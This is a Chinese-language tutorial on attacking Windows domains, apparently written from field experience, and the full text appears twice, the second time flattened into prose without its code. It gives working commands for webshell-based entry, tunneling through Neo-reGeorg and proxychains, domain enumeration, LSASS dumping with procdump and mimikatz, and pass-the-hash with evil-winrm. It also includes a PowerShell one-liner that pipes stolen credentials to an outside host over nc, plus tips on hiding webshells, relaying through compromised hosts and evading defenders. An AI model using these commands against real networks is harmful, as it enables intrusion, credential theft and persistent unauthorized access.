域渗透实战教学：初遇域林不知所措

1. 前期准备与信息收集

1.1 被动信息收集

使用工具：谷歌、微步、Shodan
收集目标：子域名、真实IP等资产信息
目的：建立目标资产清单，为后续渗透做准备

1.2 主动信息收集

准备工具：梯子、肉鸡（用于流量中转与C2服务器）
技术手段：
- 字典爆破未收录的子域名
- nmap扫描各IP段的Web常用端口
- 记录关键字（便于后续内网IP对应）
识别特征：大量Web服务器的IP段可能是内网入口

2. 漏洞扫描与利用

2.1 扫描工具选择

推荐组合：XRay + Crawlergo
- XRay特点：发包少、速度快
- Crawlergo功能：主动爬虫
优势：高效发现漏洞，降低被发现风险

2.2 漏洞利用流程

发现漏洞后立即利用对应EXP写入webshell
初步信息收集：
- whoami 查看当前用户
- ipconfig /all 查看网络配置
- net time /domain 检查域环境
- tasklist 查看运行进程（识别杀软如企业版迈克菲）

3. 权限维持与横向移动

3.1 Cobalt Strike上线受阻处理

常见问题：出网流量被WAF拦截
解决方案：
- 尝试WebSocket代理工具：ABPTTS、Neo-reGeorg、reGeorg、reDuh
- OpenSSL版本问题处理：降版本解决算法兼容性问题
- 示例命令：
```
python3 neoreg.py -k passwd -u https://URL -l 0.0.0.0 -p 8899 -vv
```

3.2 内网扫描技术

扫描目标：SMB、SSH、Web、RDP、FTP、NFS、Oracle、MSSQL、MySQL、Redis等服务

代理技术：

proxychains + nmap

# /etc/proxychains.conf配置
socks5 1.1.1.1 8899

Metasploit隧道

setg Proxies socks5:1.1.1.1:8899
setg ReverseAllowProxy true

3.3 持久化技巧

多位置留webshell
伪装技巧：修改文件名、时间戳等属性
目的：防止被发现后完全失去访问权限

4. 域环境信息收集

4.1 基础命令

type C:\Windows\System32\drivers\etc\hosts  # 查看hosts文件
arp -a                                     # 查看网段活跃IP
netstat -nao                               # 查看网络连接
net view /domain                           # 查看域列表
net accounts /domain                       # 查看域密码策略
net config workstation                     # 查看本机所在域
net group /domain                          # 查看域用户组列表
net group "domain admins" /domain          # 查看域管列表
net user /domain                           # 查看域用户列表
net user "User_Name" /domain               # 查看特定域用户信息
systeminfo                                 # 查看系统信息
wmic product                               # 查看安装程序

4.2 盘符访问问题

可能原因：光驱占用盘符
解决方案：格式化前禁用光驱驱动释放盘符

5. 凭证获取技术

5.1 使用procdump获取hash

procdump.exe -ma lsass.exe lsass.dmp
# 本地使用mimikatz分析
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

5.2 免杀mimikatz技术

非交互式读取：

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit >> shash.txt

PowerShell远程读取：

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | nc 1.1.1.1 9999

6. 横向移动技术

6.1 IPC共享利用

net use z: \\IP\c$ "passwd" /user:"Administrator"

6.2 PassTheHash(PTH)攻击

推荐工具：evil-winrm.rb

proxychains evil-winrm.rb -i 1.1.1.1 -u username -H xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

6.3 文件搜索技巧

(dir -r *.xmls).FullName  # 递归搜索特定后缀文件

7. SharePoint相关技巧

特征：aspx文件间歇性404
测试方法：在IIS默认路径放置静态文件测试
可能原因：SharePoint特殊配置

8. 应急处理与持久化

浏览器密码提取：读取Chrome保存的密码
灾备系统利用：当主系统下线时使用预留的灾备系统webshell
风控策略：适当暂停活动避免触发更严格防御

9. 总结与最佳实践

前期信息收集要全面，建立完整资产清单
多准备几种代理工具应对不同网络环境
横向移动前充分收集域环境信息
持久化措施要多样化且隐蔽
注意活动节奏，避免触发蓝队应急响应
保持工具更新，特别是应对杀软和WAF的绕过技术

通过以上系统化的渗透测试流程，可以有效地在域环境中进行信息收集、权限提升和横向移动，最终达成渗透目标。

域渗透实战教学：初遇域林不知所措 1. 前期准备与信息收集 1.1 被动信息收集使用工具：谷歌、微步、Shodan 收集目标：子域名、真实IP等资产信息目的：建立目标资产清单，为后续渗透做准备 1.2 主动信息收集准备工具：梯子、肉鸡（用于流量中转与C2服务器）技术手段：字典爆破未收录的子域名 nmap扫描各IP段的Web常用端口记录关键字（便于后续内网IP对应）识别特征：大量Web服务器的IP段可能是内网入口 2. 漏洞扫描与利用 2.1 扫描工具选择推荐组合：XRay + Crawlergo XRay特点：发包少、速度快 Crawlergo功能：主动爬虫优势：高效发现漏洞，降低被发现风险 2.2 漏洞利用流程发现漏洞后立即利用对应EXP写入webshell 初步信息收集： whoami 查看当前用户 ipconfig /all 查看网络配置 net time /domain 检查域环境 tasklist 查看运行进程（识别杀软如企业版迈克菲） 3. 权限维持与横向移动 3.1 Cobalt Strike上线受阻处理常见问题：出网流量被WAF拦截解决方案：尝试WebSocket代理工具：ABPTTS、Neo-reGeorg、reGeorg、reDuh OpenSSL版本问题处理：降版本解决算法兼容性问题示例命令： 3.2 内网扫描技术扫描目标：SMB、SSH、Web、RDP、FTP、NFS、Oracle、MSSQL、MySQL、Redis等服务代理技术： proxychains + nmap Metasploit隧道 3.3 持久化技巧多位置留webshell 伪装技巧：修改文件名、时间戳等属性目的：防止被发现后完全失去访问权限 4. 域环境信息收集 4.1 基础命令 4.2 盘符访问问题可能原因：光驱占用盘符解决方案：格式化前禁用光驱驱动释放盘符 5. 凭证获取技术 5.1 使用procdump获取hash 5.2 免杀mimikatz技术非交互式读取： PowerShell远程读取： 6. 横向移动技术 6.1 IPC共享利用 6.2 PassTheHash(PTH)攻击推荐工具：evil-winrm.rb 6.3 文件搜索技巧 7. SharePoint相关技巧特征：aspx文件间歇性404 测试方法：在IIS默认路径放置静态文件测试可能原因：SharePoint特殊配置 8. 应急处理与持久化浏览器密码提取：读取Chrome保存的密码灾备系统利用：当主系统下线时使用预留的灾备系统webshell 风控策略：适当暂停活动避免触发更严格防御 9. 总结与最佳实践前期信息收集要全面，建立完整资产清单多准备几种代理工具应对不同网络环境横向移动前充分收集域环境信息持久化措施要多样化且隐蔽注意活动节奏，避免触发蓝队应急响应保持工具更新，特别是应对杀软和WAF的绕过技术通过以上系统化的渗透测试流程，可以有效地在域环境中进行信息收集、权限提升和横向移动，最终达成渗透目标。